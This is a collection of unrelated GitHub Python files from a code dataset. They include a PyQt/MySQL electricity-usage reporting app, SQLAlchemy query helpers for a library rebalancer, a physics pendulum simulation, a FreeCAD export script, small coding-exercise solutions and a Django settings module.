'\"+ todaydb +\"' LIMIT 0,1\")\n if h2powerstr:\n h2powerstr = h2powerstr[0][0]\n else:\n h2powerstr = ':0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:'\n h2powers = h2powerstr.split(':')\n h2powers = h2powers[1:-1]\n self.h2powers = []\n for h2power in h2powers:\n h2power = float(h2power)\n 
self.h2powers.append(h2power)\n \n\n def getMonthDays(self, date=None):\n if date:\n today = datetime.strptime(date, \"%Y%m%d\").strftime(\"%Y%m%d\")\n todaydb = datetime.strptime(date, \"%Y%m%d\").strftime(\"%Y-%m\")\n todayMonth = datetime.strptime(date, \"%Y%m%d\").strftime(\"%m\")\n monthdays = self.getDaysOfMonth(today)\n lastdaybefmonth = self.getLastDateOfMonth(date=self.getMonth(date=today, month=-1))\n lastdaybefmonthdb = datetime.strptime(lastdaybefmonth, \"%Y%m%d\").strftime(\"%Y-%m-%d\")\n days = []\n for monthday in range(1, monthdays+1):\n monthdaydb = \"%02d\" % monthday\n power = 0\n daydb = self.sql(\"SELECT * FROM \"+ mysql_tbl +\" WHERE `date` = '\"+ todaydb +\"-\"+ monthdaydb +\"' LIMIT 0,1\")\n if daydb:\n power = daydb[0][4]\n dateLabel = \"%s.%s\" % (monthdaydb, todayMonth)\n days.append({'date': dateLabel, 'power': power})\n return days\n\n\n def getLastDateOfMonth(self, date=None):\n date2 = datetime.strptime(date, \"%Y%m%d\")\n lastday = monthrange(date2.year, date2.month)[1]\n lastdate = datetime.strptime(\"%s%s%s\" % (date2.year, date2.month, lastday), \"%Y%m%d\").strftime(\"%Y%m%d\")\n return lastdate\n \n\n def getDaysOfMonth(self, date=None):\n if not date:\n date = datetime.now()\n else:\n date = datetime.strptime(date, \"%Y%m%d\")\n days = monthrange(date.year, date.month)\n return days[1]\n\n\n def getMonth(self, date=None, month=None):\n date = datetime.strptime(date, \"%Y%m%d\")\n date_after_month = date + relativedelta(months=month)\n date_after_month = datetime.strftime(date_after_month, \"%Y%m%d\")\n return date_after_month\n\n\n def getDate(self, date_format = '%Y%m%d', date = None, day = 0):\n if date:\n today = datetime.strptime(date, \"%Y%m%d\")\n else:\n today = datetime.now()\n result = today + timedelta(days=day)\n return result.strftime(date_format)\n \n \n def saveConf(self):\n with open(confile, 'w') as confilejson:\n json.dump(self.conf, confilejson)\n\n\n# ====================================================================================== Load File\n def loadFile(self):\n pathfull, _ = QtWidgets.QFileDialog.getOpenFileName(None, 'Вибрати файл для заванаження до бази', self.conf['pathopen'], \"Nikotex_*.txt ( Nikotex_*.txt Nikotex_*.TXT)\")\n if pathfull != '':\n pathfile, filenamefull = os.path.split(pathfull)\n filename = os.path.splitext(filenamefull)[0]\n self.conf['pathopen'] = pathfull\n lef = loadEnergoFiles()\n try:\n lef.loadfile(pathfull)\n self.saveConf()\n self.updateAll()\n self.statusBar().showMessage(\"Файл завантажено\", 10000)\n self.okDialogView.label_mess.setText(\"Файл завантажено.\")\n self.okDialogView.exec_()\n except:\n self.statusBar().showMessage(\"Помилка!\", 10000)\n self.errorDialogView.label_mess.setText('Помилка!')\n\n\n\n def saveFile(self):\n \n if self.power['apowerMonth'] > 0 or self.power['rpowerMonth'] > 0 or self.power['gpowerMonth'] > 0:\n pathfull, _ = QtWidgets.QFileDialog.getSaveFileName(None, \"Зберегти АКТ\", \"%s.xlsx\" % self.conf['pathsave'], \"XLS (*.xlsx *.XLSX)\")\n if pathfull != '':\n pathfile, filenamefull = os.path.split(pathfull)\n filename = os.path.splitext(filenamefull)[0]\n self.conf['pathsave'] = \"%s/%s\" % (pathfile, filename)\n self.saveConf()\n\n datenow = datetime.now().strftime(\"%Y%m%d\")\n datenowTextTop = \"%s %sр.\" % (months_xls[int(datenow[4:6])], datenow[:4])\n datenowTextBottom = \"\\\"%s\\\" %s %sр.\" % (datenow[6:8], months_xlsR[int(datenow[4:6])], datenow[:4])\n xls = openpyxl.load_workbook(filename = \"template.xlsx\")\n xlslist = xls['energo']\n xlslist['E4'] 
= datenowTextTop\n xlslist['B21'] = datenowTextBottom\n \n xlslist['E11'] = \"%.4f\" % (self.power['apowerMonthCnt'] / CounterCoeff)\n xlslist['E13'] = \"%.4f\" % (self.power['rpowerMonthCnt'] / CounterCoeff)\n xlslist['E15'] = \"%.4f\" % (self.power['gpowerMonthCnt'] / CounterCoeff)\n \n xlslist['F11'] = \"%.4f\" % (self.power['apowerMonthCntBef'] / CounterCoeff)\n xlslist['F13'] = \"%.4f\" % (self.power['rpowerMonthCntBef'] / CounterCoeff)\n xlslist['F15'] = \"%.4f\" % (self.power['gpowerMonthCntBef'] / CounterCoeff)\n\n xlslist['F11'] = \"%.4f\" % (self.power['apowerMonthCntBef'] / CounterCoeff)\n xlslist['F13'] = \"%.4f\" % (self.power['rpowerMonthCntBef'] / CounterCoeff)\n xlslist['F15'] = \"%.4f\" % (self.power['gpowerMonthCntBef'] / CounterCoeff)\n\n xlslist['G11'] = \"%.4f\" % (self.power['apowerMonth'] / CounterCoeff)\n xlslist['G13'] = \"%.4f\" % (self.power['rpowerMonth'] / CounterCoeff)\n xlslist['G15'] = \"%.4f\" % (self.power['gpowerMonth'] / CounterCoeff)\n\n xlslist['I11'] = \"%.0f\" % self.power['apowerMonth']\n xlslist['I13'] = \"%.0f\" % self.power['rpowerMonth']\n xlslist['I15'] = \"%.0f\" % self.power['gpowerMonth']\n\n xls.save(\"%s/%s.xlsx\" % (pathfile, filename))\n self.statusBar().showMessage(\"Файл \\\"%s.xlsx\\\" збережено\" % filename, 10000)\n else:\n self.statusBar().showMessage(\"Нема що зберігати! Нема данних за місяць.\", 10000)\n self.errorDialogView.label_mess.setText('Нема що зберігати!\\n\\nНема данних за місяць.')\n self.errorDialogView.exec_()\n\n\n\n def dateSetNow(self):\n self.date = self.getDate(date=datetime.now().strftime(\"%Y%m%d\"), day=-1)\n date = datetime.strptime(self.date, \"%Y%m%d\")\n self.calendarWidget.setSelectedDate(date)\n self.updateAll()\n\n\n def updateAll(self):\n self.reCalculate()\n self.updateUI()\n self.plotDay()\n self.plotMonth()\n self.plotYear()\n\n\n def dateChanged(self):\n self.date = self.calendarWidget.selectedDate().toString(\"yyyyMMdd\")\n# print(self.date)\n self.reCalculate()\n self.updateUI()\n self.plotDay()\n if self.date[:6] != self.dateChangeMonth[:6]:\n self.dateChangeMonth = self.date\n self.plotMonth()\n if self.date[:4] != self.dateChangeYear[:4]:\n self.dateChangeYear = self.date\n self.plotYear()\n\n\n def updateUI(self):\n self.lineEdit_apowerDay.setText(\"%.0f\" % self.power['apowerDay'])\n self.lineEdit_rpowerDay.setText(\"%.0f\" % self.power['rpowerDay'])\n self.lineEdit_gpowerDay.setText(\"%.0f\" % self.power['gpowerDay'])\n self.lineEdit_apowerMonth.setText(\"%.0f\" % self.power['apowerMonth'])\n self.lineEdit_rpowerMonth.setText(\"%.0f\" % self.power['rpowerMonth'])\n self.lineEdit_gpowerMonth.setText(\"%.0f\" % self.power['gpowerMonth'])\n self.lineEdit_apowerYear.setText(\"%.0f\" % self.power['apowerYear'])\n self.lineEdit_rpowerYear.setText(\"%.0f\" % self.power['rpowerYear'])\n self.lineEdit_gpowerYear.setText(\"%.0f\" % self.power['gpowerYear'])\n self.lineEdit_apowerCnt.setText(\"%.0f\" % self.power['apowerCnt'])\n self.lineEdit_rpowerCnt.setText(\"%.0f\" % self.power['rpowerCnt'])\n self.lineEdit_gpowerCnt.setText(\"%.0f\" % self.power['gpowerCnt'])\n \n\n def reCalculate(self):\n self.power = {}\n self.datebef = self.getDate(date=self.date, day=-1)\n powerdb = self.sql(\"SELECT * FROM \"+ mysql_tbl +\" WHERE `date` = '\"+ self.date +\"' LIMIT 0,1\")\n if powerdb:\n self.power['apowerCnt'] = powerdb[0][1]\n self.power['rpowerCnt'] = powerdb[0][2]\n self.power['gpowerCnt'] = powerdb[0][3]\n self.power['apowerDay'] = powerdb[0][4]\n self.power['rpowerDay'] = powerdb[0][5]\n 
self.power['gpowerDay'] = powerdb[0][6]\n else:\n self.power['apowerCnt'] = 0\n self.power['rpowerCnt'] = 0\n self.power['gpowerCnt'] = 0\n self.power['apowerDay'] = 0\n self.power['rpowerDay'] = 0\n self.power['gpowerDay'] = 0\n LastDateBefOfMonth = self.getLastDateOfMonth(date=self.getMonth(date=self.date, month=-1))\n\n powerLastDateBefOfMonthdb = self.sql(\"SELECT * FROM \"+ mysql_tbl +\" WHERE MONTH(date) = MONTH('\"+ LastDateBefOfMonth +\"') AND YEAR(date) = YEAR('\"+ LastDateBefOfMonth +\"') ORDER BY date DESC LIMIT 0,1\")\n powerLastDateOfMonthdb = self.sql(\"SELECT * FROM \"+ mysql_tbl +\" WHERE MONTH(date) = MONTH('\"+ self.date +\"') AND YEAR(date) = YEAR('\"+ self.date +\"') ORDER BY date DESC LIMIT 0,1\")\n\n if powerLastDateOfMonthdb and powerLastDateBefOfMonthdb:\n if powerLastDateOfMonthdb[0][1] > 0 and powerLastDateBefOfMonthdb[0][1] > 0:\n self.power['apowerMonth'] = powerLastDateOfMonthdb[0][1] - powerLastDateBefOfMonthdb[0][1]\n self.power['apowerMonthCnt'] = powerLastDateOfMonthdb[0][1]\n self.power['apowerMonthCntBef'] = powerLastDateBefOfMonthdb[0][1]\n else:\n self.power['apowerMonth'] = 0\n self.power['apowerMonthBef'] = 0\n\n if powerLastDateOfMonthdb[0][2] > 0 and powerLastDateBefOfMonthdb[0][2] > 0:\n self.power['rpowerMonth'] = powerLastDateOfMonthdb[0][2] - powerLastDateBefOfMonthdb[0][2]\n self.power['rpowerMonthCnt'] = powerLastDateOfMonthdb[0][2]\n self.power['rpowerMonthCntBef'] = powerLastDateBefOfMonthdb[0][2]\n else:\n self.power['rpowerMonth'] = 0\n self.power['rpowerMonthCnt'] = 0\n self.power['rpowerMonthBef'] = 0\n\n if powerLastDateOfMonthdb[0][3] > 0 and powerLastDateBefOfMonthdb[0][3] > 0:\n self.power['gpowerMonth'] = powerLastDateOfMonthdb[0][3] - powerLastDateBefOfMonthdb[0][3]\n self.power['gpowerMonthCnt'] = powerLastDateOfMonthdb[0][3]\n self.power['gpowerMonthCntBef'] = powerLastDateBefOfMonthdb[0][3]\n else:\n self.power['gpowerMonth'] = 0\n self.power['gpowerMonthCnt'] = 0\n self.power['gpowerMonthCntBef'] = 0\n else:\n self.power['apowerMonth'] = 0\n self.power['rpowerMonth'] = 0\n self.power['gpowerMonth'] = 0\n self.power['apowerMonthCnt'] = 0\n self.power['rpowerMonthCnt'] = 0\n self.power['gpowerMonthCnt'] = 0\n self.power['apowerMonthCntBef'] = 0\n self.power['rpowerMonthCntBef'] = 0\n self.power['gpowerMonthCntBef'] = 0\n\n# ======================================================================== за год\n dateBefYear = str(float(self.date[:4]) - 1)\n\n powerBefYeardb = self.sql(\"SELECT * FROM \"+ mysql_tbl +\" WHERE YEAR(date) = ('\"+ dateBefYear +\"') ORDER BY date DESC LIMIT 0,1\")\n powerYeardb = self.sql(\"SELECT * FROM \"+ mysql_tbl +\" WHERE YEAR(date) = ('\"+ self.date[:4] +\"') ORDER BY date DESC LIMIT 0,1\")\n if powerYeardb and powerBefYeardb:\n if powerYeardb[0][1] > 0 and powerBefYeardb[0][1] > 0:\n self.power['apowerYear'] = powerYeardb[0][1] - powerBefYeardb[0][1]\n else:\n self.power['apowerYear'] = 0\n\n if powerYeardb[0][2] > 0 and powerBefYeardb[0][2] > 0:\n self.power['rpowerYear'] = powerYeardb[0][2] - powerBefYeardb[0][2]\n else:\n self.power['rpowerYear'] = 0\n\n if powerYeardb[0][3] > 0 and powerBefYeardb[0][3] > 0:\n self.power['gpowerYear'] = powerYeardb[0][3] - powerBefYeardb[0][3]\n else:\n self.power['gpowerYear'] = 0\n else:\n self.power['apowerYear'] = 0\n self.power['rpowerYear'] = 0\n self.power['gpowerYear'] = 0\n\n\n def viewDialogAbout(self):\n aboutDialogView = aboutDialogUI()\n iconPixmap = QPixmap( pathImage + '/' + \"about2.png\" )\n aboutDialogView.label.setPixmap(iconPixmap)\n 
aboutDialogView.pushButton_ok.clicked.connect(aboutDialogView.close)\n aboutDialogView.exec_()\n \n \n def sql(self, req):\n if not self.sqlcon:\n if os.name == 'nt':\n self.sqlcon = mysql.connector.connect(host=mysql_host, user=mysql_user, password=mysql_pass, database=mysql_db)\n else:\n self.sqlcon = pymysql.connect(host=mysql_host, user=mysql_user, passwd=mysql_pass, db=mysql_db)\n with self.sqlcon:\n if os.name == 'nt':\n self.sqlcon.reconnect()\n cur = self.sqlcon.cursor()\n cur.execute(req)\n result = cur.fetchall()\n #cur.close()\n #self.sqlcon.close()\n return result\n \n\n def appquit(self, _):\n# self.sqlcon.close()\n sys.exit()\n\n\nif __name__ == '__main__':\n import sys\n app = QApplication(sys.argv)\n w = MAIN()\n w.show()\n sys.exit(app.exec_())\n","repo_name":"juf00th/aEnergo.stat","sub_path":"aENERGO.stat.py","file_name":"aENERGO.stat.py","file_ext":"py","file_size_in_byte":29330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"10578584066","text":"\"\"\"\nDatastore transaction methods\n\"\"\"\n\nfrom functools import lru_cache\n\nfrom sqlalchemy.sql import text, case\n# from pandas import read_sql\n\n\nfrom errors import RebalancerError\n\n\ndef count_records(session, model, **kwargs):\n record_count = session.query(model).filter_by(**kwargs).count()\n return record_count\n\n\ndef retrieve_records(session, model, **kwargs):\n instances = session.query(model).filter_by(**kwargs).order_by(\n model.rid).all()\n return instances\n\n\ndef retrieve_records_ordered_by_code(session, model, **kwargs):\n instances = session.query(model).filter_by(**kwargs).order_by(\n model.code).all()\n return instances\n\n\ndef insert(session, model, **kwargs):\n instance = model(**kwargs)\n session.add(instance)\n return instance\n\n\ndef create_code_idx(session, model, **kwargs):\n records = retrieve_records(\n session, model, **kwargs)\n branch_idx = {x.code: x.rid for x in records}\n\n return branch_idx\n\n\ndef retrieve_record(session, model, **kwargs):\n instance = session.query(model).filter_by(**kwargs).first()\n return instance\n\n\n@lru_cache(maxsize=32)\ndef retrieve_record_cached(session, model, **kwargs):\n instance = session.query(model).filter_by(**kwargs).first()\n return instance\n\n\ndef update_record(session, model, rid, **kwargs):\n instance = session.query(model).filter_by(rid=rid).one()\n for key, value in kwargs.items():\n setattr(instance, key, value)\n\n# def insert_or_ignore(session, model, **kwargs):\n# instance = session.query(model).filter_by(**kwargs).first()\n# if not instance:\n# instance = model(**kwargs)\n# session.add(instance)\n# return instance\n\n\n# def delete_record(session, model, **kwargs):\n# instance = session.query(model).filter_by(**kwargs).one()\n# session.delete(instance)\n\n\n# def insert_or_update(session, model, rid, **kwargs):\n# instance = session.query(model).filter_by(rid=rid).first()\n# if not instance:\n# instance = model(**kwargs)\n# session.add(instance)\n# else:\n# del kwargs['sid']\n# update_record(session, model, rid, **kwargs)\n\n\n# def retrieve_records(session, model, **kwargs):\n# instances = session.query(model).filter_by(**kwargs).order_by(\n# model.rid).all()\n# return instances\n\n\n# def retrieve_last_record(session, model):\n# instance = session.query(model).order_by(model.rid.desc()).first()\n# return instance\n\ndef world_lang_query_stmn(system_id, lang_code):\n stmn = f\"\"\"\n SELECT overflow_item.rid as rid,\n overflow_item.item_id as iid,\n 
overflow_item.bib_id as bid,\n overflow_item.title as title,\n overflow_item.author as author,\n overflow_item.call_no as call_no,\n overflow_item.pub_date as pub_date,\n branch.code as branch,\n mat_cat.code as mat_cat,\n audience.code as audn,\n language.code as lang\n FROM overflow_item\n JOIN branch ON overflow_item.src_branch_id = branch.rid\n JOIN mat_cat ON overflow_item.mat_cat_id = mat_cat.rid\n JOIN audience ON overflow_item.audn_id = audience.rid\n JOIN language ON overflow_item.lang_id = language.rid\n WHERE overflow_item.cart_id IS NULL\n AND overflow_item.system_id=:system_id\n AND language.code=:lang_code\n ORDER BY call_no, author, title;\n \"\"\"\n stmn = text(stmn)\n stmn = stmn.bindparams(\n system_id=system_id,\n lang_code=lang_code)\n return stmn\n\n\ndef english_query_stmn(system_id, audn_id, mat_cat_id):\n stmn = f\"\"\"\n SELECT overflow_item.rid as rid,\n overflow_item.item_id as iid,\n overflow_item.bib_id as bid,\n overflow_item.title as title,\n overflow_item.author as author,\n overflow_item.call_no as call_no,\n overflow_item.pub_date as pub_date,\n branch.code as branch,\n mat_cat.code as mat_cat,\n audience.code as audn,\n language.code as lang\n FROM overflow_item\n JOIN branch ON overflow_item.src_branch_id = branch.rid\n JOIN mat_cat ON overflow_item.mat_cat_id = mat_cat.rid\n JOIN audience ON overflow_item.audn_id = audience.rid\n JOIN language ON overflow_item.lang_id = language.rid\n WHERE overflow_item.cart_id IS NULL\n AND overflow_item.system_id=:system_id\n AND mat_cat.rid=:mat_cat_id\n AND audience.rid=:audn_id\n AND language.code='eng'\n ORDER BY call_no, author, title;\n \"\"\"\n\n stmn = text(stmn)\n stmn = stmn.bindparams(\n system_id=system_id,\n mat_cat_id=mat_cat_id,\n audn_id=audn_id)\n return stmn\n\n\ndef get_relevant_lang_recs(session, system_id):\n stmn = f\"\"\"\n SELECT DISTINCT language.rid, language.code, language.label\n FROM language\n JOIN overflow_item ON language.rid = overflow_item.lang_id\n WHERE overflow_item.system_id=:system_id\n AND overflow_item.cart_id IS NULL\n AND language.code <> 'eng'\n ORDER BY language.code\n \"\"\"\n stmn = text(stmn)\n stmn = stmn.bindparams(\n system_id=system_id)\n instances = session.execute(stmn)\n lang_recs = [(c.rid, c.code, c.label) for c in instances]\n return lang_recs\n\n\ndef get_items4cart(session, system_id, audn_id, mat_cat_id, lang_code):\n if lang_code == 'eng':\n # English materials\n stmn = english_query_stmn(system_id, audn_id, mat_cat_id)\n else:\n # world languages\n stmn = world_lang_query_stmn(system_id, lang_code)\n\n instances = session.execute(stmn)\n return instances\n","repo_name":"BookOps-CAT/rebalancer","sub_path":"rebalancer/datastore_transactions.py","file_name":"datastore_transactions.py","file_ext":"py","file_size_in_byte":5806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74375870762","text":"#!/usr/bin/python\n# -*- Encoding: utf-8 -*-\n\n# This is a simulation of an inverted pendulum through ode.\n# A controller allows changing the torque at the joint of the\n# rod with the world.\n#\n# Dov Grobgeld \n# 2013-02-11 Mon\n\nimport Euv.Frame as Frame\nimport Euv.EuvGtk as Euv\nimport Euv.Color as Color\nimport Euv.Shapes as Shapes\nimport ode\nimport time\nimport math\n\ndef normalize_angle(theta):\n return math.atan2(math.sin(theta),math.cos(theta))\n\n# Create the world through ode\nworld = ode.World()\nworld.setGravity( (0,-1,0) )\n\n# Make a heavy ball\nball = ode.Body(world)\nM = 
ode.Mass()\nM.setSphere(1000,0.01)\nM.mass = 1.0\nball.setMass(M)\nball.setPosition((0,1,0))\n\n# And a rod without any weight\nrod = ode.Body(world)\nM = ode.Mass()\nM.setCylinder(0.01, 2, 0.01,1)\nM.mass = 1e-3\nrod.setMass(M)\nrod.setPosition((0,0.5,0))\n\n# Connect the rod with the world through a Hinge joint.\nworld_joint = ode.HingeJoint(world)\nworld_joint.attach(rod, ode.environment)\nworld_joint.setAnchor( (0,0,0) )\nworld_joint.setAxis((0,0,1))\n\n# Connect rod with ball with a fixed joint\nrod_ball_joint = ode.FixedJoint(world)\nrod_ball_joint.attach(rod, ball)\nrod_ball_joint.setFixed()\n\n# Create the viewer window\nviewer = Euv.Viewer(size=(600,600),\n view_port_center = (0,0),\n view_port_width = 2.5,\n flip_y = True\n )\n\n# Do the simulation\n\ntotal_time = 0.0\ndt = 0.02\nKf = 0.5 # Friction force\nwhile total_time<30:\n\n # push the ball after half a second!\n if total_time >= 0.5 and total_time < 0.5+dt:\n ball.addRelForce( (-20,0,0) )\n elif total_time >= 0.5+dt and total_time < 0.5*2*dt:\n ball.addRelForce( (20,0,0) )\n\n\n angle = world_joint.getAngle()\n angle_rate_of_change = world_joint.getAngleRate()\n\n # Friction\n friction_force = -angle_rate_of_change * Kf\n\n # Control the pendulum by applying a torque at the world\n # pendulum joint.\n\n # Try with different PD parameters to explore stability of the Pendulum!\n Kp = 5\n Kd = 5\n torque = -angle * Kp - angle_rate_of_change * Kd + friction_force\n\n # Here is the control feedback\n world_joint.addTorque(torque)\n\n # Show text, the rod, and the ball\n f = Frame.Frame()\n f.add_text(pos=(-0.9,0.5),\n face='Serif 18',\n scale=0.003,\n markup=(u\"Time=%.2fs\\n\"\n u\"φ=%.2f\\n\"\n u\"ω=%.2f\\n\"\n u\"τ=%.2f\\n\"\n u\"Kp=%.2f\\n\"\n u\"Kd=%.2f\\n\"\n ) %\n (total_time, angle, angle_rate_of_change, torque, Kp, Kd),\n color=Color.Color(\"darkgreen\"))\n\n x,y,z = rod.getPosition()\n rod_shape = Shapes.rotated_rectangle( (x,y),\n angle,\n 0.03,\n 1)\n f.add_polygons([rod_shape],\n color=\"gray50\")\n\n x,y,z = ball.getPosition()\n f.add_circle((x,y),\n color='red3',\n alpha=0.8,\n radius=0.1)\n\n viewer.add_frame(f)\n time.sleep(0.01)\n\n # Step the world\n world.step(dt)\n total_time+=dt\n \nviewer.wait()\n","repo_name":"dov/dov-conrob","sub_path":"inverted-pendulum.py","file_name":"inverted-pendulum.py","file_ext":"py","file_size_in_byte":3287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"10075008094","text":"##-*- coding:utf-8 -*-\nimport logging\nimport math\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nlogging.basicConfig(level=logging.DEBUG,#控制台打印的日志级别\n filename='test.txt',\n filemode='w',##模式,有w和a,w就是写模式,每次都会重新写日志,覆盖之前的日志\n #a是追加模式,默认如果不写的话,就是追加模式\n format=\n '%(asctime)s - %(pathname)s[line:%(lineno)d] - %(levelname)s: %(message)s'\n #日志格式\n )\n# K1:期望水平,A1:最小性能水平, B1:变形斜率,x1:变形位置参数\nA1 = 20\nK1 = 50\nB1 = 0.5\nx1 = 25\nA2 = 20\nK2 = 40\nB2 = 0.5\nx2 = 70\nx = np.arange(0,70,2)\ndata = []\nfor item in x:\n y = A1 + (K1 - A1)/(1 + math.exp(B1 * (item - x1)))\n data.append(y)\n\nx_a= np.arange(70,120,2)\ndata1 = []\nfor item1 in x_a:\n y1 = A2 + (K2 - A2)/(1 + math.exp(-B2 * (item1 - x2)))\n data1.append(y1)\n\nx_t = np.append(x,x_a)\ndata_t = data + 
data1\n\nprint(\"data:%s\",str(data))\n\nplt.plot(x_t,data_t,marker=\"d\",color=\"r\")\nplt.xticks(fontsize=25)\nplt.yticks(fontsize=25)\nplt.legend()\nplt.show()\n\n\n","repo_name":"zhouxinxin19920802/Couzin_leader","sub_path":"test2/resilience.py","file_name":"resilience.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"2624993910","text":"import sys\nimport FreeCAD\nimport os\nimport Part\n\nApp = FreeCAD\n\nin_gui = False\nif App.ActiveDocument:\n assert(App.ActiveDocument.Label == \"print\")\n in_gui = True\n\nif not in_gui:\n App.newDocument(\"print\")\n App.setActiveDocument(\"print\")\n\npp = []\n\nworkdir = os.path.dirname(__file__)\npart = \"x_carriage_plate\"\nPart.insert(f'{workdir}/{part}.brep', App.ActiveDocument.Name)\np = App.ActiveDocument.getObject(part)\nif p.ViewObject:\n p.ViewObject.Visibility = True\n\nbbox = p.Shape.BoundBox\nplc = App.Placement(\n App.Vector(\n -(bbox.XMin + bbox.XMax)/2,\n -bbox.YMin,\n -(bbox.ZMin + bbox.ZMax)/2,\n ),\n App.Rotation(App.Vector(0,0,1),0)\n)\nplc = App.Placement(\n App.Vector(0, -40, 0),\n App.Rotation(App.Vector(1,0,0),90)\n).multiply(plc)\np.Placement = plc\n\npp.append(p)\n\nif 0:\n rycp = App.ActiveDocument.addObject('PartDesign::FeatureBase','rycp_base')\n rycp.BaseFeature = p\n plc = App.Placement(\n App.Vector(0, 80, 0),\n App.Rotation(App.Vector(1,0,0),0)\n ).multiply(p.Placement)\n rycp.Placement = plc\n\n pp.append(rycp)\n\nheated_plate = App.ActiveDocument.addObject(\"Part::Box\", \"HeatedPlate_base\")\nheated_plate.Length = \"200 mm\"\nheated_plate.Width = \"200 mm\"\nheated_plate.Height = \"3 mm\"\nheated_plate.Placement = App.Placement(\n App.Vector(-100, -100, -3),\n #App.Vector(0, 0, -3),\n App.Rotation(App.Vector(0,0,1),0)\n)\nif heated_plate.ViewObject:\n heated_plate.ViewObject.Visibility = True\n\nprint(heated_plate.Shape.BoundBox)\n\nimport Mesh\nMesh.export(pp,f\"{workdir}/{part}.stl\")\n","repo_name":"sevikkk/valurap","sub_path":"freecad/print_fixture.py","file_name":"print_fixture.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"15597747470","text":"from django.db import models\nfrom django.utils.translation import gettext_lazy as _\n\n\nclass Subject(models.Model):\n\n class SubjectName(models.TextChoices):\n MATH = 'MATH', _('MATH')\n ENGLISH = 'ENGLISH', _('ENGLISH')\n HISTORY = 'HISTORY', _('HISTORY')\n name = models.CharField(\n max_length=30,\n choices=SubjectName.choices,\n default=SubjectName.MATH,\n help_text='과목',\n )\n teachers = models.ManyToManyField(\n 'time_tables.Teacher',\n related_name='teacher_subjects',\n )\n\n def __str__(self):\n return self.name\n","repo_name":"baobab-man/django-school-system","sub_path":"time_tables/models/subject.py","file_name":"subject.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"25162919404","text":"# ========================\n# Information\n# ========================\n\n# Direct Link: https://www.hackerrank.com/challenges/30-running-time-and-complexity/problem\n# Difficulty: Medium\n# Max Score: 30\n# Language: Python\n\n# ========================\n# Solution\n# ========================\n\n# Note: 1 is NOT a prime number, that is, a number divisable by another number less or equal to the square root of the first number, it is NOT prime\n\nfor _ 
in range(int(input())):\n num = int(input())\n if num == 1:\n print(\"Not prime\")\n else:\n if(num % 2 == 0 and num > 2):\n print(\"Not prime\")\n else:\n for i in range(3, int(num**(1/2))+1, 2):\n if num % i == 0:\n print(\"Not prime\")\n break\n else:\n print(\"Prime\")\n","repo_name":"nathan-abela/HackerRank-Solutions","sub_path":"30 Days of Code/Python/26 - Day 25 - Running Time and Complexity.py","file_name":"26 - Day 25 - Running Time and Complexity.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":388,"dataset":"github-code","pt":"19"} +{"seq_id":"70216389805","text":"n = int(input())\r\ntr = []\r\nfor _ in range(n):\r\n a = list(map(int, input().split()))\r\n tr.append(a)\r\n\r\nfor i in range(n):\r\n for j in range(i+1):\r\n if i == 0:\r\n tr[i][j] = tr[i][j]\r\n continue\r\n if j == 0:\r\n up = tr[i-1][0]\r\n tr[i][j] += tr[i-1][0]\r\n continue\r\n if j == i :\r\n left = tr[i-1][j-1]\r\n tr[i][j] += tr[i-1][j-1]\r\n continue\r\n\r\n else:\r\n up_left = tr[i-1][j-1]\r\n up_right = tr[i-1][j]\r\n tr[i][j] += max(up_left, up_right)\r\n\r\nresult = 0\r\nfor j in range(n):\r\n result = max(result, tr[n-1][j])\r\nprint(result)","repo_name":"yeni28/Algorithm","sub_path":"백준/Silver/1932. 정수 삼각형/정수 삼각형.py","file_name":"정수 삼각형.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37056109251","text":"import os\n\nfrom django.urls import reverse_lazy\nfrom dotenv import load_dotenv\nfrom pathlib import Path # python3 only\nenv_path = Path('.') / '.env'\nload_dotenv(dotenv_path=env_path)\n\nBASE_DIR = os.path.dirname(os.path.dirname((os.path.dirname(os.path.abspath(__file__)))))\n\nADMINS = [('Admin', )]\nMANAGERS = ADMINS\nAUTH_USER_MODEL = 'users.User'\n\nSECRET_KEY = os.getenv('SECRET_KEY', 'very_secret_key')\n\nALLOWED_HOSTS = [\"\"]\n\nMEDIA_URL = '/media/'\nMEDIA_ROOT = os.path.join(BASE_DIR, 'media')\n\nSTATICFILES_DIRS = [\n os.path.join(BASE_DIR, 'static'),\n]\n\n# Django-registration-redux\nACCOUNT_ACTIVATION_DAYS = 1\nSITE_ID = 1\n\nLOGIN_URL = reverse_lazy('authy:login')\nLOGIN_REDIRECT_URL = reverse_lazy('accounts:profile')\nLOGOUT_REDIRECT_URL = reverse_lazy('index')\n\nSESSION_EXPIRE_AT_BROWSER_CLOSE = True\n\n# Google ReCaptcha keys (and their TEST keys as default values)\nRECAPTCHA_PUBLIC_KEY = os.getenv('RECAPTCHA_PUBLIC_KEY', '6LeIxAcTAAAAAJcZVRqyHh71UMIEGNQ_MXjiZKhI')\nRECAPTCHA_PRIVATE_KEY = os.getenv('RECAPTCHA_PRIVATE_KEY', '6LeIxAcTAAAAAGG-vFI1TnRWxMZNFuojJ4WifJWe')\nSILENCED_SYSTEM_CHECKS = ['captcha.recaptcha_test_key_error']\n\n# Required by django-registration-redux\nINCLUDE_REGISTER_URL = False\nINCLUDE_AUTH_URLS = False\n# REGISTRATION_OPEN = False # Disables registering of new users\n\nGENERATE_DUMMY_LISTING = True\n\nEMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'\n\n# CELERY related settings\nCELERY_BROKER_URL = os.getenv('CELERY_BROKER_URL', 'redis://localhost:6379')\n# CELERY_RESULT_BACKEND = os.getenv('CELERY_BROKER_URL', 